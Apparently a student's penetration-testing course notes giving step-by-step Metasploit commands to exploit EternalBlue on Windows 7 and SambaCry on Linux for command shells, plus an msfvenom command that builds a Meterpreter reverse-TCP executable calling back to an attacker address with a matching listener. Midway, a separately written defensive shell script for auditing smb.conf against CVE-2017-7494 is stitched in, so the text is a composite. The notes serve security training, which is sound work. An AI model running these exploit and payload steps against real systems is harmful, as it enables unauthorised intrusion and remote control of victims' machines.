- Grade 2 Session 8
- =================
- Console Based Exploitation 3
- Windows 7 --> Eternal Blue
- Samba Cry --> Eternal Red
- Application Based Exploitation
- Payload Based Exploitation
- Post Exploitation --> Local Privilege Escalation
- GUI Based Exploitation --> Armitage
- Console Based Exploitation 3
- ----------------------------
- Eternal Blue --> NSA Exploit leaked by Shadow Brokers
- EternalBlue-Double Pulsar
- dll --> Dynamic Link Library file
- Double Pulsar creates a malicious .dll file and Eternal Blue executes that malicious .dll file on the target system.
- Shadow Brokers ---> Fuzzbunch.py
- Empire --> MSF of NSA
- Metasploit Module
- Steps
- =====
- Open a terminal
- 1. #arp-scan --local
- Target IP Address --> 192.168.228.138
- 2. #nmap 192.168.228.138
- 3. #nmap -sS -sC -sV 192.168.228.138
- 4. #nmap 192.168.228.138 --script vuln
- CVE-2017-0143
- Open another terminal, start metasploit framework
- 5. #msfconsole
- 6. #search CVE-2017-0143
- 7. #use auxiliary/scanner/smb/smb_ms17_010
- 8. #options
- 9. #set rhosts 192.168.228.138
- 10. #options
- 11. #run
- Host is vulnerable to the exploit
- 12. #use exploit/windows/smb/ms17_010_eternalblue
- 13. #show options
- 14. #set rhost 192.168.228.138
- 15. #options
- 16. #exploit
- C:\Windows\System32> --> I got access to the command prompt
- For Changing the payload
- set payload windows/meterpreter/reverse_tcp
- Samba Cry - Eternal Red
- =======================
- A vulnerability for Linux-based OSes. SMBv2.
- NSA Exploit leaked by Shadow Brokers.
- Open a terminal
- 1. #arp-scan --local
- Target IP Address --> 192.168.228.151
- 2. #nmap 192.168.228.151
- 3. #nmap -sS -sC -sV 192.168.228.151
- 4. #nmap 192.168.228.151 --script vuln
- Open another terminal, start metasploit framework
- 5. #search is_known_pipename
- 6. #search cve-2017-7494
- exploit/linux/samba/is_known_pipename
- 7. #use exploit/linux/samba/is_known_pipename
- 8. #info
- 9. #options
- 10. #set rhost 192.168.228.151
- 11. #run
- Will give me a raw shell --> Bash shell
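For defending the Samba host targeted in the steps above, this added example (not part of the original notes) audits an smb.conf for the `nt pipe support = no` workaround for CVE-2017-7494 and lists the shares that allow writes. It assumes the flaw needs a writable share to land a library on; the function names, share names and sample config are constructed for illustration.

```sh
# Added example, not from the original notes: audit smb.conf for CVE-2017-7494 exposure.

# Print the [global] value of parameter $2 (lowercase, no spaces) in file $1.
smb_global_value() {
    awk -v want="$2" '
        /^[ \t]*[#;]/ { next }
        /^[ \t]*\[/   { s = tolower($0); gsub(/[ \t\r]/, "", s); g = (s == "[global]"); next }
        g && index($0, "=") {
            k = tolower(substr($0, 1, index($0, "=") - 1)); gsub(/[ \t]/, "", k)
            v = tolower(substr($0, index($0, "=") + 1));    gsub(/^[ \t]+|[ \t\r]+$/, "", v)
            if (k == want) val = v
        }
        END { if (val != "") print val }' "$1"
}

# Print each share in file $1 that permits writes (read only defaults to yes).
smb_writable_shares() {
    awk '
        function emit() { if (name != "" && name != "global" && w) print name }
        /^[ \t]*[#;]/ { next }
        /^[ \t]*\[/   { emit(); name = tolower($0); gsub(/^[ \t]*\[|\].*$/, "", name); w = 0; next }
        index($0, "=") {
            k = tolower(substr($0, 1, index($0, "=") - 1)); gsub(/[ \t]/, "", k)
            v = tolower(substr($0, index($0, "=") + 1));    gsub(/[ \t\r]/, "", v)
            if (k == "readonly") w = (v ~ /^(no|false|0)$/)
            if (k ~ /^(writable|writeable|writeok)$/) w = (v ~ /^(yes|true|1)$/)
        }
        END { emit() }' "$1"
}

# Return 1 when named pipes are enabled AND a writable share exists, else 0.
audit_smb_conf() {
    pipes=$(smb_global_value "$1" ntpipesupport)
    shares=$(smb_writable_shares "$1" | tr '\n' ' ')
    case "$pipes" in no|false|0) echo "OK: nt pipe support disabled in [global]"; return 0 ;; esac
    if [ -z "$shares" ]; then echo "INFO: pipes enabled, no writable shares"; return 0; fi
    echo "RISK: named pipes enabled with writable shares: $shares"
    return 1
}

# Constructed sample config (hypothetical share names), written to path $1.
write_sample_conf() {
    printf '%s\n' '[global]' ' workgroup = LAB' ' ; nt pipe support = no' \
        '[public]' ' read only = no' '[docs]' ' writeable = no' > "$1"
}

sample=$(mktemp) && write_sample_conf "$sample"
audit_smb_conf "$sample" || true; rm -f "$sample"
```

Disabling named pipes can break some functionality for Windows clients, so treat it as a stopgap until Samba itself is patched.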
- Application Based Exploitation
- ==============================
- Open the terminal, start with msfconsole
- 1. #msfconsole
- 2. #search payload/windows/meterpreter
- payload/windows/meterpreter/reverse_tcp --> use
- payload/windows/meterpreter_reverse_tcp
- payload/windows/meterpreter/reverse_http
- payload/windows/meterpreter_reverse_tcp
- Open Another Terminal, for creating a payload - stub
- 3. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.25 lport=8989 -f exe > /root/Desktop/prasheel.exe
- -p --> selecting the payload
- windows/meterpreter/reverse_tcp --> is the payload
- lhost --> attacker's IP Address
- lport --> attacker's listening port
- -f --> file format
- exe --> executable file
- > --> destination of the output
- /root/Desktop/prasheel.exe --> is the output file
- Go back to the first terminal, exploit, set the listening server
- 4. #use exploit/multi/handler
- 5. #show options
- 6. #set payload windows/meterpreter/reverse_tcp
- 7. #show options
- 8. #set lport 8989
- 9. #set lhost 192.168.0.25
- 10. #exploit
- Armitage --> GUI Based Exploitation
- Graphical Version of Metasploit Framework